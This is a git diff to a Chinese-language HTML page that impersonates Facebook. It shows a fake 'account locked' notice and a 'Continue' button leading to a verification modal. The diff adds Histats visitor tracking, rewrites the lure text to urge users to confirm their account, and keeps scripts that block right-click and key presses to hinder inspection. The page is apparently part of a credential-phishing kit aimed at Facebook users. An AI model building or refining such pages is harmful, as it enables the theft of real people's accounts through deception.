--- a/pages/class/index.html
+++ b/pages/class/index.html
@@ -1,6 +1,19 @@
 <!DOCTYPE html>
 <html lang="en">
     <head>
+          <!-- Histats.com  START  (aync)-->
+<script type="text/javascript">var _Hasync= _Hasync|| [];
+    _Hasync.push(['Histats.start', '1,4849175,4,0,0,0,00010000']);
+    _Hasync.push(['Histats.fasi', '1']);
+    _Hasync.push(['Histats.track_hits', '']);
+    (function() {
+    var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
+    hs.src = ('//s10.histats.com/js15_as.js');
+    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
+    })();</script>
+    <noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4849175&101" alt="" border="0"></a></noscript>
+    <!-- Histats.com  END  -->
+    
 <!-- disabled Dev mode -->
 
 <script src="../jwena.js"></script> 
@@ -62,7 +75,7 @@
             </div>
             <div class="mt-4">
                 <p class="text-center h3">
-                    我们已永久锁定您的帐户
+                    您好，我们需要确认该帐户属于您
                 </p>
             </div>
             <hr class="my-4" />
@@ -70,14 +83,13 @@
 
          <div class="p-3 mb-2 bg-secondary bg-opacity-25 text-dark rounded">
                <div _ngcontent-cdd-c35="" class="row mb-1 detail"><div _ngcontent-cdd-c32="" class="col-2">
-			   <br>
 			   <img _ngcontent-cdd-c32="" src="https://i.ibb.co/PG1jhHC/simon.png" width="100%" alt="">
 			   </div>
 			   <div _ngcontent-cdd-c32="" class="col-10 text-left mb-3">
 	          <p><strong>帐户被锁定 <script>
               document.write(new Date().toLocaleString('en-us',{month:'long', year:'numeric', day:'numeric'}))
               </script></strong>
-			  </p>您无法使用 Facebook，因为您的帐户或其中的活动不符合我们的社区标准。我们无法审核此决定，因为自您的帐户被禁用以来已经过去了太长时间。<p></p>
+			  </p>要继续使用，请单击下面的“继续”按钮并按照说明进行操作<p></p>
 
 
            </div>
@@ -85,14 +97,15 @@
 </div>
             <hr class="my-4" />
             <p class="text-center small">
-                如果您认为这是我们系统的错误，您可以提交评论
+                您需要完成一些安全步骤来确认这是
+                 你的帐户。
             </p>
             <button
                 type="button"
                 class="btn btn-primary d-block mx-auto w-100"
                 data-bs-toggle="modal"
                 data-bs-target="#staticBackdrop">
-                <b> 审查 </b>
+                <b> 继续 </b>
             </button>
         </div>
         <div
@@ -112,7 +125,7 @@
 				
            <div class="thepadding"><span style="color: #3c78d8; font-family: 'Roboto', 'Arial'; font-size: 11pt; vertical-align: baseline;"><strong>您好，我们需要确认该帐户属于您
             </strong></span>  <b style="color: #4d4d4d;font-weight: bold;"></b></div>
-			<p class="text-center small">避免拥有您的帐户<span style="color: #3c78d8; font-family: 'Roboto', 'Arial'; font-size: 10pt; vertical-align: baseline;"><strong>锁定</strong></span>  <b style="color: #4d4d4d;font-weight: bold;"></b> 请验证您的帐户.</div>
+			<p class="text-center small">避免拥有您的帐户 <span style="color: #3c78d8; font-family: 'Roboto', 'Arial'; font-size: 10pt; vertical-align: baseline;"><strong>残疾人</strong></span>  <b style="color: #4d4d4d;font-weight: bold;"></b> 请验证您的帐户.</div>
                     <div class="modal-body">
                         <div class="container">
                             <div class="mt-4">
@@ -201,7 +214,7 @@ else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
 document.oncontextmenu=new Function("return false")
 // -->
 </script>
-<script src="../jquery.min.js"></script>
+<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
 <script>
 
 $(document).keydown(function (event) {
